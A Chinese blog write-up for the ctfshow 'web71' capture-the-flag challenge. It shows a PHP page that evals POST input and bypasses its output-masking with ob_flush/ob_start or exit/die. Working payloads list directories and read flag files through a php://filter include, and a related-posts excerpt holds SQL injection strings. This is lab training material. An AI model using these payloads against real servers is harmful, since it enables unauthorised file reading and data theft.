[ctfshow web入门] web71

已于 2025-05-13 16:48:39 修改
阅读量412 收藏 9
点赞数 5
分类专栏: ctfshow web入门 文章标签: 前端 web安全 网络安全
于 2025-05-10 14:14:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50332504/article/details/147851942
版权

信息收集

下载index.php并查看

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

ob_get_contents:可以获取缓冲区中的内容,并将其存储在变量中,以便进一步处理或保存。
ob_end_clean:用于清空输出缓冲区的内容,并关闭输出缓冲。
preg_replace:按照正则表达式替换字符,这里是将0-9 a-z替换成?

没什么用的小知识:
众所周不知,我们输出的时候,比如print是将内容发送到缓冲区的,然后系统会在恰当的时机自动帮我们把缓冲区的内容输出打印。这是我学C++的时候学的,我大胆猜测php原理大致相似。

解题

ob_end_clean删除最上面的输出缓冲区并输出其内容。
那么解题思路是不让他清空,而是让它在清空前打印出来就好了
查看PHP 输出控制函数,看看有什么函数可以利用的

利用php输出控制函数

这几个函数都可以:

ob_end_flush();
ob_flush();
ob_get_flush();
ob_start();

前三个原理都是提前输出
ob_start是创建一个新的缓冲区,而ob_end_clean()是删除最顶层的输出缓冲区及其所有内容,这刚好删除了最新创建的那个缓冲去的所有内容,保护了之前的那个缓冲区。

new buffer  --> ob_end_clean
eval($c) buffer
other buffer
......

flag.php显然没有flag,查根目录flag在/flag.txt

c=var_export(scandir('.'));ob_end_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");ob_flush();
c=var_export(scandir('/'));ob_get_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");ob_start();

解题的截图放在最后

程序提前死亡

只要程序提前死了,那么后续的代码就不会执行了

c=var_export(scandir('/'));exit();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");die();

在这里插入图片描述
在这里插入图片描述

这一题的重点在于绕过ob_end_clean删除缓冲区,所以关于读目录和关于读文件的更多方法不再展示,有需要可以观看前面的章节。

web70    目录    web72

ctfshow web入门 web87
2401_83272517的博客
05-25 1224
入门2年半还没有入门的菜坤的日常wp
ctfshow web入门 信息搜集
2301_79697181的博客
11-24 1644
访问/admin/是一个后台登入地址,尝试弱密码无果后发现可以选择忘记密码,需要填写所在城市,通过上面获得的QQ号进行搜索,信息上显示了属地是西安,提交后获得新密码:admin7789。访问/editor/目录,点击插入文件,选择文件空间,可以看到整个目录结构,在/var/www/html/nothinghere/fl000g.txt处发现flag文件。打开靶场使用dirsearch工具对靶场进行目录扫描,发现可以访问/admin/目录,并在网页的结尾发现泄露的QQ邮箱。
ctfshow web入门19
m0_74125780的博客
09-04 298
首先我们根据提示,右键检查,发现用户名就是admin,而密码是一串字符串。我们将它输入,发现答案不对。发现这是一个AES加密,并且是CBC,iv和key都告诉我们了,而p是加密之后的结果,所以我们是需要解密。所以我们利用工具,这里我用的是随波逐流,将其解密,得到结果,这就是密码。
ctfshow web入门 Java
2301_81040377的博客
06-04 758
好东西专打全部题都是struts2框架漏洞使用方法在md里面。
[ctfshow web入门] web27
qq_50332504的博客
04-08 241
录取名单有一个list.xlsx在list.xlsx里随便选一个填进去抓包看看我们这里结合标题的爆破,不难想到,爆破这个生日。这次应该是真的了,因为这组合有点少,可以短时间穷举完。
CTFshow web入门 爆破
2301_81040377的博客
04-01 468
这是一个强大的伪随机数生成算法,能够生成更高质量的随机数序列,相较于标准的。爆破这里就结束了,这个我是真想总结,因为感触比较深,主要难点就是玩会bp,会调设置,然后的web25的工具我还没弄好,下个周末有时间了再来。密码为shark63,账号一般为admin所以不用管(我用的不好,别人直接出来了我得这样子才行,将就着看)随便传一个值得到第一个随机数(1060359145),然后再爆种子,有问题没做出来不玩了。域名失效了,看的wp很细节,在子域名里面有flag。第一种逆天解法,直接什么都不填,send就行。
ctfshow web入门 黑盒测试
2301_81040377的博客
05-20 975
扫后台但是其实dirsearch自带的字典是没有的我们可以添加一下。访问clear.php然后发现并没有删除,原来是需要传参才可以删除。我是直接填的账号密码,至于账号为什么是admin我猜的。这些文件挨个试发现啥也没,最后仔细对比发现其实都是。进入页面发现有标题搜索了随便搞一个拿到注入点。这里有个菜鸟往事点进来就可以知道注入点。密码前2位是小写字母,后三位是数字。但是还有一种方法是万能密码。访问debug发现权限不足。但是没啥用哇,查看源代码。这里文章看的我好有感触。可以和上题一样直接秒了。
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1874
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow web入门 web234--web249
2301_81040377的博客
05-04 850
空格以及相关的字符都被过滤,我们使用括号进行绕过。过滤了or但是我们已经知道可以用。我没想到这里居然还用到了左右链接。睡眠时间一定要调小不然跑不出来。过滤就php,这个就是要使用。也被禁了,我们可以用表表。
CTFshow Web入门 爆破
m0_62905261的博客
10-23 424
CTFshow Web入门 爆破
ctfshow web入门--爆破
2402_87078084的博客
02-22 161
随便输入账号密码进行登录,抓了半天都没有抓到有用户名和密码的包,最后还是用的bp的内嵌浏览器才抓到。然后进行爆破,这里我们采用 Custom iterator进行爆破,具体操作可参考。疑似base64编码,所以解码试试看,发现是我们输入的账号密码,并且是。点击连接进去就是登录页面,但并没有给账号密码,所以直接抓包看一下。我们再使用爆破成功的账号密码,就能得到flag。提示中给了一个压缩包,下载后发现是一个字典。状态码为200即为爆破成功。
ctfshow web入门 nodejs334-338
2301_80548709的博客
04-27 873
这题入门题,下载附件以.zip的格式打开,拿到源代码,进行代码审计,发现,按照他的逻辑.输入正确的用户名及密码即可登录,这里需要注意的是,对于这个代码的逻辑,是你输入的用户名是不能等于CTFSHOW的,所以我们输入他的小写即可,因为它后面有toUppercase()函数,会将我们输入的大写,所以不用管.js大小写特性参考。
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1283
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
ctfshow web入门 爆破web25详解
m0_73860001的博客
07-11 1148
这里说一下为什么这样做,因为如果我直接打开终端,接着输入【tar -zxvf php_mt_seed-4.0.tar.gz】的话我这台虚拟机上会报错,但我对这个虚拟机不熟悉,去找了一些资料有以为博主是输入了绝对路径解决这个报错的,【tar -zxvf 绝对路径】,我懒得去找绝对路径就有感而发从那里试了试,没想到成功了。4.随后【下载】那里会出现一个【php_mt_seed-4.0】的文件夹,右键出现菜单点击【从这里打开终端】这里我是在【./php_mt_seed 2078517280】加了一个.c,
如何使用 React Hooks 替代类组件的生命周期方法?
最新发布
官方推荐
05-12 1543
如何使用 React Hooks 替代类组件的生命周期方法?
16前端项目----交易页
2401_83475219的博客
05-10 786
商品清单展示、订单提交等功能。使用reduce方法计算商品总数和总价。为了方便管理大量接口,在main.js中统一引入所有请求函数并挂载到Vue原型上。
Webug4.0靶场通关笔记-靶场搭建方法(3种方法)
mooyuan的网络安全博客
05-10 950
Webug4.0 是国内安全团队开发的一款专注于Web应用安全的渗透测试实战平台(靶场),适合网络安全学习者从入门到进阶的实战训练,本文讲解3种搭建webug4.0靶场的方法。
蓝牙身份证阅读器使用Uniapp调用二次开发demo
广东东信智能科技有限公司的专栏
05-10 739
view class="devices_id">设备ID:{{item.deviceId}}</view>
【 Redis | 实战篇 短信登录 】
2402_88700528的博客
05-08 1380
主要完成了基于Session实现登录,解决集群的Session共享问题,从而实现了基于Redis来实现共享Session登录。
ctfshow web入门 web35
03-29
### CTFShow Web 入门 Web35 的解题思路 CTFShow 平台中的 Web 类别题目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手分析并尝试解决。 #### 题目背景与目标 Web35 是一个典型的基于 GET 请求参数的注入类题目[^1]。通过访问页面可以发现存在动态加载的内容或者查询功能,这表明可能存在未经过滤的输入点用于执行恶意操作。具体来说,该题目的核心在于利用 URL 参数构造特定请求来绕过验证机制获取隐藏数据。 #### 技术要点解析 - **SQL Injection Basics**: 如果怀疑有 SQL 注射风险,则应测试各种特殊字符组合如 `'`, `"`, `--` 和其他可能影响语句逻辑的部分。当遇到错误反馈时更需注意调整payload试探数据库版本及结构信息。 ```sql ' OR '1'='1 -- ``` 上述代码片段展示了如何构建简单的布尔型盲注 payload 来改变原始查询条件从而达到控制结果集的目的。 - **Error-Based Exploitation**: 尝试触发异常响应以暴露更多关于内部工作流程的信息。某些情况下服务器会返回详细的错误描述有助于进一步确认假设方向正确与否。 - **Union Select Technique**: 当得知列数匹配情况之后可采用 union select 方法读取额外字段内容直至找到敏感资料为止。 ```sql ?param=1 UNION SELECT null,version(),database() ``` 此段示例说明了怎样运用union select技术从不同表里提取有用情报同时保持整体语法有效性的方法。 综上所述,在处理此类问题过程中要灵活应用多种技巧相互配合才能顺利通关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值